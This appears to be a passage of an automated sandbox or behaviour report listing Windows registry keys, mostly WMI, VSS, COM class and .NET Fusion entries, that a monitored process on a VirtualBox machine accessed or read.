HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Tracing\WMI\FlushTimer
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Tracing\WMI\AgeLimit
HKEY_LOCAL_MACHINE\SYSTEM\Setup
HKEY_LOCAL_MACHINE\SYSTEM\Setup\UpgradeInProgress
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Safeboot\Option
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\VSS\VssAccessControl
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\VSS\Settings
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VSS\Settings\ActiveWriterStateTimeout
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\VSS\Diag
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VSS\Diag\(Default)
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\VSS\Diag\WMI Writer
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VSS\Settings\TornComponentsMax
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{00000100-0000-0000-C000-000000000046}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{00000100-0000-0000-C000-000000000046}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{00000100-0000-0000-C000-000000000046}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{609B9555-4FB6-11D1-9971-00C04FBBB345}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{609B9555-4FB6-11D1-9971-00C04FBBB345}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{609B9555-4FB6-11D1-9971-00C04FBBB345}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{609B9557-4FB6-11D1-9971-00C04FBBB345}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{609B9557-4FB6-11D1-9971-00C04FBBB345}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{609B9557-4FB6-11D1-9971-00C04FBBB345}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{F309AD18-D86A-11D0-A075-00C04FB68820}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{F309AD18-D86A-11D0-A075-00C04FB68820}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{F309AD18-D86A-11D0-A075-00C04FB68820}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{7C857801-7381-11CF-884D-00AA004B2E24}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{7C857801-7381-11CF-884D-00AA004B2E24}\TreatAs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{7C857801-7381-11CF-884D-00AA004B2E24}\Progid
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{7C857801-7381-11CF-884D-00AA004B2E24}\Progid
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{7C857801-7381-11CF-884D-00AA004B2E24}\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{7C857801-7381-11CF-884D-00AA004B2E24}\InprocServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{7C857801-7381-11CF-884D-00AA004B2E24}\InProcServer32\InprocServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{7C857801-7381-11CF-884D-00AA004B2E24}\InProcServer32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{7C857801-7381-11CF-884D-00AA004B2E24}\InProcServer32\ThreadingModel
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{7C857801-7381-11CF-884D-00AA004B2E24}\InprocHandler32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{7C857801-7381-11CF-884D-00AA004B2E24}\InprocHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\IdentifierLimit
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\QueryLimit
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\PathLimit
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\ArbThrottlingEnabled
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\ArbSystemHighMaxLimitFactor
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\ArbTaskMaxSleep
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\ArbSystemHighThreshold1
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\ArbSystemHighThreshold1Mult
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\ArbSystemHighThreshold2
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\ArbSystemHighThreshold2Mult
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\ArbSystemHighThreshold3
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\ArbSystemHighThreshold3Mult
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\Unchecked Task Count
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\Repository Directory
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\Build
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\Logging Directory
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\Default Repository Driver
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\ConfigValueCoreFsrepVersion
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\Repository Cache Spill Ratio
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\CheckPointValue
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\SnapShotValue
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Wbem\CIMOM
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\CheckRepositoryOnNextStartup
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\NumWriteIdCheck
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\Max Class Cache Size
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\Max Class Cache Item Age (ms)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\NextAutoRecoverFile
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\Enable Provider Subsystem
HKEY_LOCAL_MACHINE\Software\Microsoft\Wbem\Transports\Decoupled\Client
HKEY_LOCAL_MACHINE\Software\Microsoft\Wbem\Transports\Decoupled\Client\{024D43BD-09FA-4CB3-A425-C9AFB00D8F9D}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{024D43BD-09FA-4CB3-A425-C9AFB00D8F9D}\CreationTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{024D43BD-09FA-4CB3-A425-C9AFB00D8F9D}\Provider
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{024D43BD-09FA-4CB3-A425-C9AFB00D8F9D}\Scope
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{024D43BD-09FA-4CB3-A425-C9AFB00D8F9D}\Locale
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{024D43BD-09FA-4CB3-A425-C9AFB00D8F9D}\User
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{024D43BD-09FA-4CB3-A425-C9AFB00D8F9D}\MarshaledProxy
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{024D43BD-09FA-4CB3-A425-C9AFB00D8F9D}\ProcessIdentifier
HKEY_LOCAL_MACHINE\Software\Microsoft\Wbem\Transports\Decoupled\Client\{1B619FBC-5204-4C91-8F2A-B6406B0F0278}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{1B619FBC-5204-4C91-8F2A-B6406B0F0278}\CreationTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{1B619FBC-5204-4C91-8F2A-B6406B0F0278}\Provider
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{1B619FBC-5204-4C91-8F2A-B6406B0F0278}\Scope
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{1B619FBC-5204-4C91-8F2A-B6406B0F0278}\Locale
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{1B619FBC-5204-4C91-8F2A-B6406B0F0278}\User
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{1B619FBC-5204-4C91-8F2A-B6406B0F0278}\MarshaledProxy
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{1B619FBC-5204-4C91-8F2A-B6406B0F0278}\ProcessIdentifier
HKEY_LOCAL_MACHINE\Software\Microsoft\Wbem\Transports\Decoupled\Client\{D1398C3F-1B66-4A30-916D-776E1DDE80A1}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{D1398C3F-1B66-4A30-916D-776E1DDE80A1}\CreationTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{D1398C3F-1B66-4A30-916D-776E1DDE80A1}\Provider
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{D1398C3F-1B66-4A30-916D-776E1DDE80A1}\Scope
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{D1398C3F-1B66-4A30-916D-776E1DDE80A1}\Locale
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{D1398C3F-1B66-4A30-916D-776E1DDE80A1}\User
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{D1398C3F-1B66-4A30-916D-776E1DDE80A1}\MarshaledProxy
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{D1398C3F-1B66-4A30-916D-776E1DDE80A1}\ProcessIdentifier
HKEY_LOCAL_MACHINE\Software\Microsoft\Wbem\Transports\Decoupled\Client\{EFE6E846-7D3A-45F6-A5FA-A686F2785670}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{EFE6E846-7D3A-45F6-A5FA-A686F2785670}\CreationTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{EFE6E846-7D3A-45F6-A5FA-A686F2785670}\Provider
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{EFE6E846-7D3A-45F6-A5FA-A686F2785670}\Scope
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{EFE6E846-7D3A-45F6-A5FA-A686F2785670}\Locale
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{EFE6E846-7D3A-45F6-A5FA-A686F2785670}\User
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{EFE6E846-7D3A-45F6-A5FA-A686F2785670}\MarshaledProxy
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{EFE6E846-7D3A-45F6-A5FA-A686F2785670}\ProcessIdentifier
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Server\CreationTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Server\ProcessIdentifier
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\EnableEvents
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\ConfigValueEssToBeInitialized
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\Low Threshold On Events (B)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\High Threshold On Events (B)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\Max Wait On Events (ms)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\Merger Query Arbitration Enabled
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\ConfigValueEssNeedsLoading
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\List of event-active namespaces
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\ESS\//./root/subscription
HKEY_LOCAL_MACHINE\software\microsoft\wbem\cimom
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\SetupDate
HKEY_LOCAL_MACHINE\Software\Microsoft\Wbem\CIMOM
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\FinalizerBatchSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\ClientCallbackTimeout
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\FinalizerQueueThreshold
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\Max Tasks
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\Max Async Result Queue Size
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\cimv2
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\cimv2
HKEY_LOCAL_MACHINE\Software\Microsoft\OleAut
HKEY_CLASSES_ROOT\CLSID\{661FF7F6-F4D1-4593-B59D-4C54C1ECE68B}\InProcServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{661FF7F6-F4D1-4593-B59D-4C54C1ECE68B}\InprocServer32\(Default)
HKEY_CLASSES_ROOT\CLSID\{661FF7F6-F4D1-4593-B59D-4C54C1ECE68B}\LocalServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{661FF7F6-F4D1-4593-B59D-4C54C1ECE68B}\InprocServer32\ThreadingModel
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{661FF7F6-F4D1-4593-B59D-4C54C1ECE68B}\InprocServer32\Synchronization
HKEY_CLASSES_ROOT\CLSID\{661FF7F6-F4D1-4593-B59D-4C54C1ECE68B}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{661FF7F6-F4D1-4593-B59D-4C54C1ECE68B}\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{661FF7F6-F4D1-4593-B59D-4C54C1ECE68B}\AppId
HKEY_LOCAL_MACHINE\system\currentcontrolset\control\minint
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\wmi
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\wmi
HKEY_CLASSES_ROOT\CLSID\{D2D588B5-D081-11d0-99E0-00C04FC2F8EC}\InProcServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D2D588B5-D081-11D0-99E0-00C04FC2F8EC}\InprocServer32\(Default)
HKEY_CLASSES_ROOT\CLSID\{D2D588B5-D081-11d0-99E0-00C04FC2F8EC}\LocalServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D2D588B5-D081-11D0-99E0-00C04FC2F8EC}\InprocServer32\ThreadingModel
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D2D588B5-D081-11D0-99E0-00C04FC2F8EC}\InprocServer32\Synchronization
HKEY_CLASSES_ROOT\CLSID\{D2D588B5-D081-11d0-99E0-00C04FC2F8EC}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D2D588B5-D081-11D0-99E0-00C04FC2F8EC}\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D2D588B5-D081-11D0-99E0-00C04FC2F8EC}\AppId
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\Root
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\Root
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{07435309-D440-41B7-83F3-EB82DB6C622F}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{07435309-D440-41B7-83F3-EB82DB6C622F}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{07435309-D440-41B7-83F3-EB82DB6C622F}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{21CD80A2-B305-4F37-9D4C-4534A8D9B568}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{21CD80A2-B305-4F37-9D4C-4534A8D9B568}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{21CD80A2-B305-4F37-9D4C-4534A8D9B568}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{06413D98-405C-4A5A-8D6F-19B8B7C6ACF7}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{06413D98-405C-4A5A-8D6F-19B8B7C6ACF7}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{06413D98-405C-4A5A-8D6F-19B8B7C6ACF7}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\Sink Transmit Buffer Size
HKEY_LOCAL_MACHINE\Software\Microsoft\Wbem\Cimom
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\DefaultRpcStackSize
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\CMF\Config
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\CMF\Config\SYSTEM
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\wmiprvse.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{73E709EA-5D93-4B2E-BBB0-99B7938DA9E4}\InprocServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{73E709EA-5D93-4B2E-BBB0-99B7938DA9E4}\InprocHandler32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{73E709EA-5D93-4B2E-BBB0-99B7938DA9E4}\InprocHandler
HKEY_LOCAL_MACHINE\Software\Microsoft\WBEM\WDM
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\WDM\IDE\DiskVBOX_HARDDISK___________________________1.0_____\5&33d1638a&0&0.0.0_0-{05901221-D566-11d1-B2F0-00A0C9062910}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\WDM\WMIBinaryMofResource.HighDateTime=30016556,LowDateTime=1652017424,Name="C:\Windows\system32\advapi32.dll[MofResourceName]"

Read Keys

HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\InstallRoot
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\CLRLoadLogDir
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\UseLegacyV2RuntimeActivationPolicyDefaultValue
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\OnlyUseLatestCLR
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Fusion\NoClientChecks
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\SideBySide\PreferExternalManifest
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\GCStressStart
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\GCStressStartAtJit
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\DisableConfigCache
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\CacheLocation
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\DownloadCacheQuotaInKB
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\EnableLog
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\LoggingLevel
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\ForceLog
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\LogFailures
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\VersioningLog
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\LogResourceBinds
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\UseLegacyIdentityFormat
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\DisableMSIPeek
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NoClientChecks
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\DevOverrideEnable
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\LatestIndex
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index126\NIUsageMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index126\ILUsageMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\ConfigMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\ConfigString
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\MVID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\EvalationData
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\ILDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\NIDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\MissingDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7950e2c5\183e33de\83\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7950e2c5\183e33de\83\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7950e2c5\183e33de\83\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7950e2c5\183e33de\83\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7950e2c5\183e33de\83\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\mscorlib,2.0.0.0,,b77a5c561934e089,x86
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\Latest
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\index36
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\LegacyPolicyTimeStamp
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\ConfigMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\ConfigString
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\MVID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\EvalationData
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\ILDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\NIDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\MissingDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\475dce40\2d382ce6\85\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\475dce40\2d382ce6\85\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\475dce40\2d382ce6\85\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\475dce40\2d382ce6\85\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\475dce40\2d382ce6\85\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\1bd7b0d8\87\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\1bd7b0d8\87\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\1bd7b0d8\87\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\1bd7b0d8\87\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\1bd7b0d8\87\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2dd6ac50\163e1f5e\80\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2dd6ac50\163e1f5e\80\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2dd6ac50\163e1f5e\80\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2dd6ac50\163e1f5e\80\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2dd6ac50\163e1f5e\80\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\424bd4d8\1c83327b\86\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\424bd4d8\1c83327b\86\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\424bd4d8\1c83327b\86\Modules
